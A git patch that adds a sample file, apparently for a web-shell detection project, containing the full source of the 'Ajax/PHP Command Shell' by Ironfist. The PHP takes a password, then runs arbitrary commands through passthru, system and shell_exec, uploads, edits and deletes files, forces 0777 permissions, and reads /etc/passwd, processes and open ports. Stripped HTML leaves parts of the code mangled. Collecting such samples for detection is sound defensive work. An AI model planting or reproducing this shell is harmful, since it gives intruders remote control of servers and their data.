From 48936efa96ae17295be4e0a71be3294f0ec6aef8 Mon Sep 17 00:00:00 2001 From: Mathieu Deous Date: Mon, 2 May 2022 20:18:23 +0200 Subject: Make application go-install-able and create a docker image --- data/samples/classic/ajaxshell.php | 652 +++++++++++++++++++++++++++++++++++++ 1 file changed, 652 insertions(+) create mode 100644 data/samples/classic/ajaxshell.php (limited to 'data/samples/classic/ajaxshell.php') diff --git a/data/samples/classic/ajaxshell.php b/data/samples/classic/ajaxshell.php new file mode 100644 index 0000000..0445858 --- /dev/null +++ b/data/samples/classic/ajaxshell.php @@ -0,0 +1,652 @@ + 'ClearScreen()', +'Clear History' => 'ClearHistory()', +'Can I function?' => "runcommand('canirun','GET')", +'Get server info' => "runcommand('showinfo','GET')", +'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')", +'Open ports' => "runcommand('netstat -an | grep -i listen','GET')", +'Running processes' => "runcommand('ps -aux','GET')", +'Readme' => "runcommand('shellhelp','GET')" + +); +$thisfile = basename(__FILE__); + +$style = ''; +$sess = __FILE__.$password; +if(isset($_POST['p4ssw0rD'])) +{ + if($_POST['p4ssw0rD'] == $password) + { + $_SESSION[$sess] = $_POST['p4ssw0rD']; + } + else + { + die("Wrong password"); + } + +} +if($_SESSION[$sess] == $password) +{ + if(isset($_SESSION['workdir'])) + { + if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir'])) + { + chdir($_SESSION['workdir']); + } + } + + if(isset($_FILES['uploadedfile']['name'])) + { + $target_path = "./"; + $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); + if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { + + } + } + + if(isset($_GET['runcmd'])) + { + + $cmd = $_GET['runcmd']; + + print "".get_current_user()."~# ". htmlspecialchars($cmd)."
"; + + if($cmd == "") + { + print "Empty Command..type \"shellhelp\" for some ehh...help"; + } + + elseif($cmd == "upload") + { + print '
Uploading to: '.realpath("."); + if(is_writable(realpath("."))) + { + print "
I can write to this directory"; + } + else + { + print "
I can't write to this directory, please choose another one."; + } + + } + elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file))) + { + if(file_exists($file[1]) && is_dir($file[1])) + { + chdir($file[1]); + $_SESSION['workdir'] = $file[1]; + print "Current directory changed to ".$file[1]; + } + else + { + print "Directory not found"; + } + } + + elseif(strtolower($cmd) == "shellhelp") + { +print 'Ajax/PHP Command Shell +© By Ironfist + +The shell can be used by anyone to command any server, the main purpose was +to create a shell that feels as dynamic as possible, is expandable and easy +to understand. + +If one of the command execution functions work, the shell will function fine. +Try the "canirun" command to check this. + +Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re +not used to these commands, google a little. + +Custom Functions +If you want to add your own custom command in the Quick Commands list, check +out the code. The $function array contains \'func name\' => \'javascript function\'. +Take a look at the built-in functions for examples. + +I know this readme isn\'t providing too much information, but hell, does this shell +even require one :P + +- Iron + '; + + } + elseif(ereg("editfile (.*)",$cmd,$file)) + { + if(file_exists($file[1]) && !is_dir($file[1])) + { + print "

"; + } + else + { + print "File not found."; + } + } + elseif(ereg("deletefile (.*)",$cmd,$file)) + { + if(is_dir($file[1])) + { + if(rmdir($file[1])) + { + print "Directory succesfully deleted."; + } + else + { + print "Couldn't delete directory!"; + } + } + else + { + if(unlink($file[1])) + { + print "File succesfully deleted."; + } + else + { + print "Couldn't delete file!"; + } + } + } + elseif(strtolower($cmd) == "canirun") + { + print "If any of these functions is Enabled, the shell will function like it should.
"; + if(function_exists(passthru)) + { + print "Passthru: Enabled
"; + } + else + { + print "Passthru: Disabled
"; + } + + if(function_exists(exec)) + { + print "Exec: Enabled
"; + } + else + { + print "Exec: Disabled
"; + } + + if(function_exists(system)) + { + print "System: Enabled
"; + } + else + { + print "System: Disabled
"; + } + if(function_exists(shell_exec)) + { + print "Shell_exec: Enabled
"; + } + else + { + print "Shell_exec: Disabled
"; + } + print "
Safe mode will prevent some stuff, maybe command execution, if you're looking for a
reason why the commands aren't executed, this is probally it.
"; + if( ini_get('safe_mode') ){ + print "Safe Mode: Enabled"; + } + else + { + print "Safe Mode: Disabled"; + } + print "

Open_basedir will block access to some files you shouldn't access.
"; + if( ini_get('open_basedir') ){ + print "Open_basedir: Enabled"; + } + else + { + print "Open_basedir: Disabled"; + } + } + //About the shell + elseif(ereg("listdir (.*)",$cmd,$directory)) + { + + if(!file_exists($directory[1])) + { + die("Directory not found"); + } + //Some variables + chdir($directory[1]); + $i = 0; $f = 0; + $dirs = ""; + $filez = ""; + + if(!ereg("/$",$directory[1])) //Does it end with a slash? + { + $directory[1] .= "/"; //If not, add one + } + print "Listing directory: ".$directory[1]."
"; + print ""; + + if ($handle = opendir($directory[1])) { + while (false !== ($file = readdir($handle))) { + if(is_dir($file)) + { + $dirs[$i] = $file; + $i++; + } + else + { + $filez[$f] = $file; + $f++; + } + + } + print "
DirectoriesFiles
"; + + foreach($dirs as $directory) + { + print "[D][W]".$directory."
"; + } + + print "		"; + + foreach($filez as $file) + { + print "[D]".$file."
"; + } + + print "
"; + } + } + elseif(strtolower($cmd) == "about") + { + print "Ajax Command Shell by Ironfist.
Version $version"; + } + //Show info + elseif(strtolower($cmd) == "showinfo") + { + if(function_exists(disk_free_space)) + { + $free = disk_free_space("/") / 1000000; + } + else + { + $free = "N/A"; + } + if(function_exists(disk_total_space)) + { + $total = trim(disk_total_space("/") / 1000000); + } + else + { + $total = "N/A"; + } + $path = realpath ("."); + + print "Free: $free / $total MB
Current path: $path
Uname -a Output:
"; + + if(function_exists(passthru)) + { + passthru("uname -a"); + } + else + { + print "Passthru is disabled :("; + } + } + //Read /etc/passwd + elseif(strtolower($cmd) == "etcpasswdfile") + { + + $pw = file('/etc/passwd/'); + foreach($pw as $line) + { + print $line; + } + + + } + //Execute any other command + else + { + + if(function_exists(passthru)) + { + passthru($cmd); + } + else + { + if(function_exists(exec)) + { + exec("ls -la",$result); + foreach($result as $output) + { + print $output."
"; + } + } + else + { + if(function_exists(system)) + { + system($cmd); + } + else + { + if(function_exists(shell_exec)) + { + print shell_exec($cmd); + } + else + { + print "Sorry, none of the command functions works."; + } + } + } + } + } + } + + elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent'])) + { + $file = $_POST['filetosave']; + if(!is_writable($file)) + { + if(!chmod($file, 0777)) + { + die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^ + } + } + + $fh = fopen($file, 'w'); + $dt = $_POST['filecontent']; + fwrite($fh, $dt); + fclose($fh); + } + else + { +?> + + +Command Shell ~ <?php print getenv("HTTP_HOST"); ?> + + + + + + + + + + +
+ +

+
Quick Commands
+ +
+ $execute) +{ +print ' 
'; +} +?> + +
+ + +
+
Command history
+
+
+
About
+
+
+Ajax/PHP Command Shell
by Ironfist +
+Version + +
+
+ +
Thanks to everyone @ +SharePlaza +
+milw0rm +
+and special greetings to everyone in rootshell +
+ +		 + + + + +
+[Execute command] +[Upload file] +[Change directory] +[Filebrowser] +[Create File] + +
+ +
+
+   
+Command:
+
+
+
+
+ + + +
+
You are not logged in, please login.
Password: +
"; +} +?> \ No newline at end of file -- cgit v1.3